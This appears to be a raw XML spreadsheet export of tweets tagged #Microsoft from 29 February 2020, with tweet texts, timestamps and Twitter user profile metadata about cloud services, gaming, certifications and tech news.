    <t>{'id': 809229705073147904, 'id_str': '809229705073147904', 'name': 'eStream Studios', 'screen_name': 'eStream_Studios', 'location': '', 'description': 'Follow us and subscribe for tech and gaming news! Check out this interesting passive income opportunity! \nðŸ‘‰https://t.co/GO2HSl2v24ðŸ‘ˆ', 'url': 'https://t.co/GO2HSl2v24', 'entities': {'url': {'urls': [{'url': 'https://t.co/GO2HSl2v24', 'expanded_url': 'http://bit.ly/FXtrade11', 'display_url': 'bit.ly/FXtrade11', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/GO2HSl2v24', 'expanded_url': 'http://bit.ly/FXtrade11', 'display_url': 'bit.ly/FXtrade11', 'indices': [107, 130]}]}}, 'protected': False, 'followers_count': 10014, 'friends_count': 11345, 'listed_count': 75, 'created_at': 'Thu Dec 15 02:52:51 +0000 2016', 'favourites_count': 3245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 263548, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/985754941774905344/TUf_hNbF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/985754941774905344/TUf_hNbF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/809229705073147904/1523857231',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</si>
  <si>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16:58:31 +0000 2020</t>
  </si>
  <si>
    <t>My 2 favorite red white and blue hats
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy #gamer #gamer4life... https://t.co/gnymopiGfN</t>
  </si>
  <si>
    <t>Sat Feb 29 16:57:42 +0000 2020</t>
  </si>
  <si>
    <t>This position is in my team!
#hpc #azure #microsoft https://t.co/DexPZFUWJ9</t>
  </si>
  <si>
    <t>{'id': 177029424, 'id_str': '177029424', 'name': 'Carolina Gonzalez Zapata', 'screen_name': 'CarodeFelpa', 'location': 'Seattle, WA, USA.', 'description': 'TPM, esposa, amiga, hija, nieta, hermana y mama de la Fran! :)', 'url': 'https://t.co/WTE7176ksd', 'entities': {'url': {'urls': [{'url': 'https://t.co/WTE7176ksd', 'expanded_url': 'http://www.multidata.cl', 'display_url': 'multidata.cl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 177, 'friends_count': 214, 'listed_count': 5, 'created_at': 'Wed Aug 11 02:13:04 +0000 2010', 'favourites_count': 1177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 412,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'http://pbs.twimg.com/profile_images/1100267429/felposaforo_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100267429/felposaforo_normal.JPG', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/177029424/1398701390', 'profile_link_color': '19CF86',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</si>
  <si>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Sat Feb 29 16:51:15 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus Fears Are Causing Tech Giants To Cancel Conferences, Curb Travel, And Take Hits To Supply Chains https://t.co/t3aTJEnzFz
#tech #coronavirus #CoronavirusOutbreak #COVID2019 #SupplyChain #Google #Apple #Microsoft #Amazon</t>
  </si>
  <si>
    <t>{'id': 884022229, 'id_str': '884022229', 'name': 'Rimah Harb', 'screen_name': 'HarbRimah', 'location': '', 'description': '#AI #Technology #Entrepreneur #startups #IoT #Robots - Linkedin: https://t.co/92yZF1WlFN', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/92yZF1WlFN', 'expanded_url': 'http://lb.linkedin.com/in/rimahharb', 'display_url': 'lb.linkedin.com/in/rimahharb', 'indices': [65, 88]}]}}, 'protected': False, 'followers_count': 8278, 'friends_count': 4899, 'listed_count': 712, 'created_at': 'Tue Oct 16 08:34:28 +0000 2012', 'favourites_count': 1259, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27093,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'http://pbs.twimg.com/profile_images/909317895355863040/ls7cAjxm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/909317895355863040/ls7cAjxm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/884022229/1493888914',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</si>
  <si>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16:50:01 +0000 2020</t>
  </si>
  <si>
    <t>Read how #Microsoft made @Forbes' Blockchain 50, a list that highlights enterprises embracing #blockchain technology to speed up business processes, increase transparency, and cut costs: https://t.co/yx0EzlWUFe #blockchain #crypto</t>
  </si>
  <si>
    <t>{'id': 1156225143032541184, 'id_str': '1156225143032541184', 'name': 'BlockChain', 'screen_name': 'BlockChain_Fact', 'location': '', 'description': '#BlockChain Facts!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 100, 'listed_count': 1, 'created_at': 'Tue Jul 30 15:28:50 +0000 2019', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 509, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1156231098038247425/SFVfbi3m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156231098038247425/SFVfbi3m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1156225143032541184/1564643346',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</si>
  <si>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16:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 16:46:02 +0000 2020</t>
  </si>
  <si>
    <t>Excel's flexibility allows the recompilation of various files and documents and makes them accessible to smart devices from any location, at any time. #Excel #ReturnOnInvestment #Investment #BusinessGrowth #Sales #optimization #microsoftoffice #microsoft #office #business https://t.co/nC2gIKcJXb</t>
  </si>
  <si>
    <t>{'id': 282283809, 'id_str': '282283809', 'name': 'Venxel', 'screen_name': 'VenXel_ca', 'location': 'Montreal, Quebec', 'description': 'Smart solutions that speed-up processes and create a unique brand experience.', 'url': 'https://t.co/6hiFVQIoWg', 'entities': {'url': {'urls': [{'url': 'https://t.co/6hiFVQIoWg', 'expanded_url': 'http://www.venxel.com', 'display_url': 'venxel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 657, 'friends_count': 0, 'listed_count': 3, 'created_at': 'Thu Apr 14 22:39:10 +0000 2011', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 254,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'http://pbs.twimg.com/profile_images/1097604676550307840/uCxGU3ch_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1097604676550307840/uCxGU3ch_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/282283809/1569605711',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</si>
  <si>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16:45:07 +0000 2020</t>
  </si>
  <si>
    <t>Join us on our late night launch event for DOOM Eternal and Animal Crossing on 3/19/20.
#animalcrossing #NewHorizons #switch #NintendoSwitch #Nintendo #animals #doom #DoomEternal #ps4 #XboxOne #Microsoft #sony #hyped #launch #sliceanddice #FPS https://t.co/SG5Xva1lmC</t>
  </si>
  <si>
    <t>{'id': 1188136442519871493, 'id_str': '1188136442519871493', 'name': 'Jupiter GameStop', 'screen_name': 'JupiterGamestop', 'location': 'Jupiter, FL', 'description': 'GameStop Chasewood Plaza 6390 W Indiantown Rd, Ste 52, Jupiter Fl, 33458 Mon-Sat: 10a-9pm Sun: 11am-8pm Call us at:(561)741-3634 https://t.co/fwgS3vfEbF', 'url': 'https://t.co/tdGuwsPbPU', 'entities': {'url': {'urls': [{'url': 'https://t.co/tdGuwsPbPU', 'expanded_url': 'http://gamestop.com', 'display_url': 'gamestop.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/fwgS3vfEbF', 'expanded_url': 'http://GameStop.com', 'display_url': 'GameStop.com', 'indices': [129, 152]}]}}, 'protected': False, 'followers_count': 2, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Sat Oct 26 16:54:32 +0000 2019', 'favourites_count': 15, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 33, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1188137409185234944/0J5Ww0uH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188137409185234944/0J5Ww0uH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188136442519871493/1582565866',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</si>
  <si>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16:43:07 +0000 2020</t>
  </si>
  <si>
    <t>Where Do I Start with the Cloud? Part 1: Microsoft Azure #Microsoft #Azure #AzureFamily https://t.co/UUB6oxXIeW https://t.co/m1YXa5IqyS</t>
  </si>
  <si>
    <t>Sat Feb 29 16:38:55 +0000 2020</t>
  </si>
  <si>
    <t>[Blog Post] Hardening settings for #DomainController! #Microsoft #Hardening #Security #IT https://t.co/OQX2dODXHp</t>
  </si>
  <si>
    <t>Sat Feb 29 16:37:21 +0000 2020</t>
  </si>
  <si>
    <t>Intel?s 10nm Cannon Lake Processors Will Be Ready By Late 2019. #microsoft #science https://t.co/kVvh0bCLYa https://t.co/IaTCbhI4H4</t>
  </si>
  <si>
    <t>{'id': 752031573424410624, 'id_str': '752031573424410624', 'name': 'Criss Story', 'screen_name': 'cgrissstory', 'location': 'Illinois, USA', 'description': 'Click or Tap?', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3436, 'friends_count': 4038, 'listed_count': 40, 'created_at': 'Sun Jul 10 06:47:53 +0000 2016', 'favourites_count': 8218, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2859, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/784458488613335040/hHf4nQiW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784458488613335040/hHf4nQiW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752031573424410624/1475864376',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</si>
  <si>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16:34:40 +0000 2020</t>
  </si>
  <si>
    <t>How to Account for Multiple Companies in One Database - Gravity Software https://t.co/7u5lcyhGC3
 #WeekendVibes #CloudAccounting #BusinessSolutions #Microsoft #MsPartner #GoGravity #CRMUG #QBO #Clients #SMBs https://t.co/FCosomTJ6l</t>
  </si>
  <si>
    <t>Sat Feb 29 16:30:58 +0000 2020</t>
  </si>
  <si>
    <t>Confused about which Live Migration transport method to use? Follow this quick tip to correctly configure your hosts for optimal transfers. #Microsoft #HyperV https://t.co/tCeWFl36xZ</t>
  </si>
  <si>
    <t>Sat Feb 29 16:29:58 +0000 2020</t>
  </si>
  <si>
    <t>Easy dashboard creation with #PowerBI and #Microsoft Fast Track usage reports #spsbre @Sarabarbosa https://t.co/DdivcBkTDF</t>
  </si>
  <si>
    <t>{'id': 1097087089273946112, 'id_str': '1097087089273946112', 'name': 'Atlassian Community Bremen (ACE Bremen)', 'screen_name': 'ACE_Bremen', 'location': 'Bremen, Deutschland', 'description': 'Twitter channel of the #Atlassian #Community #Bremen', 'url': 'https://t.co/IkjQY1cUzA', 'entities': {'url': {'urls': [{'url': 'https://t.co/IkjQY1cUzA', 'expanded_url': 'https://ace.atlassian.com/bremen/', 'display_url': 'ace.atlassian.com/bremen/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 63, 'listed_count': 5, 'created_at': 'Sun Feb 17 10:55:19 +0000 2019', 'favourites_count': 274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 345, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234054984204943361/sIhHtb3Z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234054984204943361/sIhHtb3Z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1097087089273946112/1551470675',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</si>
  <si>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16:26:51 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Deep Learning Prerequisites: Logistic Regression in Python #udemycoupon -&amp;gt; https://t.co/8AasGBd2t3
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Sat Feb 29 16:25:04 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft Global Social Entrepreneurship initiative offers #tech aid, education &amp;amp; #grants to maximize potential of social #entrepreneurs &amp;amp; accelerate their impact. https://t.co/KCHeoHwzGJ 
@msftnonprofits @MSFTnews #SocialEntrepreneurship H/T @DanitaBlackwood #WorldOfGood</t>
  </si>
  <si>
    <t>Sat Feb 29 16:22:13 +0000 2020</t>
  </si>
  <si>
    <t>Last session of the day and it's a good one. All about Dynamics 365 Certifications with Julian Sharp here @scottishsummit. I have my Dynamics 365 Fundamentals, and I want A LOT more, so looking forward to this one!! 
#SS2020 #ScottishSummit #Microsoft #MSDyn365 #Dynamics365 https://t.co/z6mbogWUQd</t>
  </si>
  <si>
    <t>Sat Feb 29 16:21:48 +0000 2020</t>
  </si>
  <si>
    <t>Old news new tech #microsoft #underwaterdatacenters https://t.co/KTZBd6haTq https://t.co/vY9SRjFecM</t>
  </si>
  <si>
    <t>{'id': 1163818931775295493, 'id_str': '1163818931775295493', 'name': 'Sir 0racle IV', 'screen_name': 'CaptainNode', 'location': ' Chicago', 'description': 'I like long walks on the beach, decentralized ledger technology, ai and quantum computing. I live in the suburbs and eat ice cream every day.', 'url': 'https://t.co/BWGA4Glgxd', 'entities': {'url': {'urls': [{'url': 'https://t.co/BWGA4Glgxd', 'expanded_url': 'http://www.fourswords.io', 'display_url': 'fourswords.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 863, 'friends_count': 1470, 'listed_count': 9, 'created_at': 'Tue Aug 20 14:24:05 +0000 2019', 'favourites_count': 5147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4532, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220590073344937989/G94bIc9y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220590073344937989/G94bIc9y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1163818931775295493/1573491363',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</si>
  <si>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16:20:24 +0000 2020</t>
  </si>
  <si>
    <t>Get #scalable #storage without breaking the bank. Try an agile #platform to meet your needs. https://t.co/Y5OrBspQY6 #azure #microsoft #cloud https://t.co/xU9aFM29ZU</t>
  </si>
  <si>
    <t>{'id': 48864421, 'id_str': '48864421', 'name': 'SSISG', 'screen_name': 'SSISG', 'location': 'The Universe', 'description': 'SSISG operates as a Global Information Technology Services provider, that focuses on providing Enterprise solutions, SaaS, and Infrastructure.', 'url': 'https://t.co/Rrou3ckD9F', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rrou3ckD9F', 'expanded_url': 'https://www.ssisg.com', 'display_url': 'ssisg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 595, 'friends_count': 835, 'listed_count': 82, 'created_at': 'Fri Jun 19 23:28:26 +0000 2009', 'favourites_count': 666, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4981,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'http://pbs.twimg.com/profile_images/2964905509/fc4f486baa05d9853f348f2b93f3d565_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2964905509/fc4f486baa05d9853f348f2b93f3d565_normal.png',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</si>
  <si>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16:07:49 +0000 2020</t>
  </si>
  <si>
    <t>Creating a world of good: Microsoft launches the Global Social Entrepreneurship program #Microsoft
https://t.co/ksO7UP8mcQ</t>
  </si>
  <si>
    <t>{'id': 16582932, 'id_str': '16582932', 'name': 'MariAnne Woehrle', 'screen_name': 'agnewfarms', 'location': 'Washington DC', 'description': 'SharePoint, Dynamics GP, Power BI, Office 365, CRM, Pixel ðŸ˜‰, R, Power BI, Technology for Associations', 'url': 'https://t.co/9iDMuYSNWE', 'entities': {'url': {'urls': [{'url': 'https://t.co/9iDMuYSNWE', 'expanded_url': 'http://about.me/mariannewoehrle', 'display_url': 'about.me/mariannewoehrle', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7148, 'friends_count': 7605, 'listed_count': 278, 'created_at': 'Fri Oct 03 19:47:49 +0000 2008', 'favourites_count': 864, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14313, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '020D0C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/623585002660347904/KfPziTwE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/623585002660347904/KfPziTwE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16582932/1399553138', 'profile_link_color': '8A0466', 'profile_sidebar_border_color': 'BCB302', 'profile_sidebar_fill_color': '171106', 'profile_text_color': '473623', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 16:05:13 +0000 2020</t>
  </si>
  <si>
    <t>If you work in #Dynamics, #Azure, or one of #Microsofts enterprise #tech fields, events are a great way to learn, network, and develop new skills. 
Here are a few events you need to put in your diary this year! 
 https://t.co/ygvc84UchK  https://t.co/29TI6mNKeH</t>
  </si>
  <si>
    <t>Sat Feb 29 16:05:10 +0000 2020</t>
  </si>
  <si>
    <t>We're looking for a delivery consultant to join our team!
We need someone with strong relationship building skills &amp;amp; the ability to understand &amp;amp; express business priorities as well as technical requirements: https://t.co/HN0QJThlUw
#microsoft #techjob #York #Windows</t>
  </si>
  <si>
    <t>{'id': 2504638026, 'id_str': '2504638026', 'name': 'PowerON', 'screen_name': 'PowerON_UK', 'location': 'United Kingdom', 'description': 'Experts in #ITAutomation, @Microsoft Gold Partner working with #ITSpecialists to optimise #MicrosoftSolutions with IT Automation &amp; Consulting.', 'url': 'http://t.co/MFQa3ZzPOR', 'entities': {'url': {'urls': [{'url': 'http://t.co/MFQa3ZzPOR', 'expanded_url': 'http://www.poweronplatforms.com', 'display_url': 'poweronplatforms.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 339, 'friends_count': 332, 'listed_count': 20, 'created_at': 'Sun May 18 14:39:38 +0000 2014', 'favourites_count': 184, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1174,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'http://pbs.twimg.com/profile_images/958330909232631813/NuFc3ZP7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958330909232631813/NuFc3ZP7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2504638026/1554892848', 'profile_link_color': '71D5FA',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</si>
  <si>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Sat Feb 29 16:03:20 +0000 2020</t>
  </si>
  <si>
    <t>"Windows 10 Updates: Home Users Are Baffled" https://t.co/jmTh7920SM #Microsoft #Windows10 https://t.co/usDXaKmywb</t>
  </si>
  <si>
    <t>Sat Feb 29 16:00:36 +0000 2020</t>
  </si>
  <si>
    <t>Whatever your issue or question regards to Microsoft Teams, maybe a 30 minute call with a Business focused Teams expert could be just the thing!
https://t.co/UiD10PI2v8
#expertcall #microsoftteams #microsoft #collab365 #microjobs #futureofwork #gigminset</t>
  </si>
  <si>
    <t>Sat Feb 29 16:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Check it. #Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners https://t.co/uUazMA62mL via @coindesk #tech #digital #data #business</t>
  </si>
  <si>
    <t>{'id': 135922295, 'id_str': '135922295', 'name': 'Kohei Kurihara   Blockchain CMO', 'screen_name': 'kuriharan', 'location': 'Tokyo-to, Japan', 'description': '@gbaglobal President of Tokyo Chapter, CollaboGate CMO. Privacy design and SDGs, Blockchain. Next-gen data driven marketer. Letâ€™s make collaboration!', 'url': 'https://t.co/r7lP3ReEuX', 'entities': {'url': {'urls': [{'url': 'https://t.co/r7lP3ReEuX', 'expanded_url': 'https://jp.linkedin.com/in/kuriharan', 'display_url': 'jp.linkedin.com/in/kuriharan', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46877, 'friends_count': 37291, 'listed_count': 2503, 'created_at': 'Thu Apr 22 15:09:22 +0000 2010', 'favourites_count': 44142, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 233487,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'http://pbs.twimg.com/profile_images/1062357613289979909/NLvrLDsv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1062357613289979909/NLvrLDsv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/135922295/1563073340', 'profile_link_color': '040470', 'profile_sidebar_border_color': '0E285C', 'profile_sidebar_fill_color': '8CC4DE', 'profile_text_color': '153C8A', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 15:56:16 +0000 2020</t>
  </si>
  <si>
    <t>@JayMiseli @RPG_volley There are so many organizational leaders who can't see how incredible OneNote is for collaboration.  Combined with  SharePoint or One Drive and it is the ultimate tool. #OneNote #Microsoft</t>
  </si>
  <si>
    <t>{'id': 252210617, 'id_str': '252210617', 'name': 'MikeGolf', 'screen_name': 'mikegolfwilson', 'location': 'United States', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 212, 'listed_count': 0, 'created_at': 'Mon Feb 14 18:38:22 +0000 2011', 'favourites_count': 1165, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 306,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'http://pbs.twimg.com/profile_images/1672171927/faded_flag_background_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1672171927/faded_flag_background_normal.jpg',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</si>
  <si>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15:53:29 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020
As part of its move toward 'role-based training,' Microsoft will no longer offer MCSA, MCSD or MCSE certifications after June 30
https://t.co/Ls9stAb8Dt #Microsoft #MCSA #certification #IT</t>
  </si>
  <si>
    <t>{'id': 151381533, 'id_str': '151381533', 'name': 'Eng. Mahmoud Soliman', 'screen_name': 'EMahmoudSoliman', 'location': 'Mansoura - Egypt', 'description': 'Ø§Ø³ØªØ´Ø§Ø±Ù‰ ÙˆÙ…Ø¯Ø±Ø¨ ÙˆÙ…Ù‡Ù†Ø¯Ø³ Ù…Ø¹ØªÙ…Ø¯ Ù…Ù† Ù…Ø§ÙŠÙƒØ±ÙˆØ³ÙˆÙØª ÙÙ‰ Ù†Ø¸Ù… Ø´Ø¨ÙƒØ§Øª Ø§Ù„Ø­Ø§Ø³Ø¨ Ùˆ #Ø£Ù…Ù†_Ø§Ù„Ù…Ø¹Ù„ÙˆÙ…Ø§Øª -Ù‡Ø§ÙƒØ± Ø£Ø®Ù„Ø§Ù‚Ù‰-Ù…Ø­Ù‚Ù‚ Ø¬Ù†Ø§Ø¦ÙŠ ÙÙŠ Ø¬Ø±Ø§Ø¦Ù… Ø§Ù„ÙƒÙ…Ø¨ÙŠÙˆØªØ±Freelance #IT Trainer -MCSE-MCLC-MCT-CEH', 'url': 'https://t.co/RCHTAEX5av', 'entities': {'url': {'urls': [{'url': 'https://t.co/RCHTAEX5av', 'expanded_url': 'https://www.facebook.com/eng.m.soliman?ref=tn_tnmn', 'display_url': 'facebook.com/eng.m.soliman?â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6631, 'friends_count': 2977, 'listed_count': 433, 'created_at': 'Thu Jun 03 08:16:35 +0000 2010', 'favourites_count': 4394, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 111968,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'http://pbs.twimg.com/profile_images/1069953050633273350/roxUb4WM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1069953050633273350/roxUb4WM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/151381533/1543931706',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</si>
  <si>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Sat Feb 29 15:50:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Windows 10 PRO Professional 64 bit DVD + COA Product Key #Microsoft #Product #professional #Windows https://t.co/8S5Hx5zSMA</t>
  </si>
  <si>
    <t>Sat Feb 29 15:49:37 +0000 2020</t>
  </si>
  <si>
    <t>Last session @spsbre for today presented by @Sarabarbosa about enabling #Microsoft 365 Usage reports with #PowerBI https://t.co/TlTfFIrb5C</t>
  </si>
  <si>
    <t>Sat Feb 29 15:47:47 +0000 2020</t>
  </si>
  <si>
    <t>#BraneCell's CEO speaking in April in #Manhattan, plus other headliners: Chad #Rigetti; CTO/Toshiba; Whitfield Diffie, Co-inventor, #PublicKeyEncryption; Prof. Marcus, #Microsoft  &amp;amp; Prof., Niels Bohr Institute; CTO/HP.
@InQuantumTech #QuantumMechanics #HP
https://t.co/QfqYXZNpkT</t>
  </si>
  <si>
    <t>{'id': 4085148202, 'id_str': '4085148202', 'name': 'BraneCell Systems', 'screen_name': 'BraneCell', 'location': 'Boston, USA &amp; Duesseldorf, DE', 'description': 'Decentralized #QuantumComputing operating at room temp., overcoming cryogenic cloud limits, towards Classical-to-Quantumâ„¢ migration.', 'url': 'https://t.co/Izc726MDY3', 'entities': {'url': {'urls': [{'url': 'https://t.co/Izc726MDY3', 'expanded_url': 'http://www.branecell.com', 'display_url': 'branecell.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 298, 'friends_count': 890, 'listed_count': 5, 'created_at': 'Sat Oct 31 20:50:47 +0000 2015', 'favourites_count': 438, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 988,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'http://pbs.twimg.com/profile_images/999091019734904832/VoLgrWPy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/999091019734904832/VoLgrWPy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4085148202/1537290540', 'profile_link_color': '228CDB',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</si>
  <si>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15:47:00 +0000 2020</t>
  </si>
  <si>
    <t>Is E-Mail dead? #Uber is moving all of its 38,000 employees to #Slack, is a big win for the work-chat app, which has been under pressure from its rival #Microsoft Teams in the work-chat app market
#EmergingTech #DigitalTransformation #messenger 
https://t.co/5aWUpPYzDI</t>
  </si>
  <si>
    <t>{'id': 99674560, 'id_str': '99674560', 'name': 'Dr. Marcell Vollmer', 'screen_name': 'mvollmer1', 'location': 'Munich, Bavaria', 'description': 'Chief Innovation Officer @Celonis. Passionate about life &amp; coffee. PhD &amp; MBA in Economics. Social Media enthusiast and curious to continuously learn &amp; grow', 'url': 'https://t.co/EsPFMBdrDN', 'entities': {'url': {'urls': [{'url': 'https://t.co/EsPFMBdrDN', 'expanded_url': 'https://www.linkedin.com/in/marcellvollmer/', 'display_url': 'linkedin.com/in/marcellvollâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50153, 'friends_count': 43506, 'listed_count': 585, 'created_at': 'Sun Dec 27 09:07:18 +0000 2009', 'favourites_count': 202957, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 80623,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'http://pbs.twimg.com/profile_images/735212931940552704/83zOt4k5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/735212931940552704/83zOt4k5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/99674560/1486476950',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</si>
  <si>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15:43:54 +0000 2020</t>
  </si>
  <si>
    <t>@kumaranupam25 Excellent job on this article. I am not impressed by the lack of missing actions and realized this morning I need to do this flow. Rather than creating it from scratch, you had it all laid out nicely here for me! https://t.co/XgufabCWKl #sharepoint #microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 15:37:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft lowered expectations for quarterly revenue #People #Tech https://t.co/zZiE0G90rC https://t.co/ycpMQbpfEP</t>
  </si>
  <si>
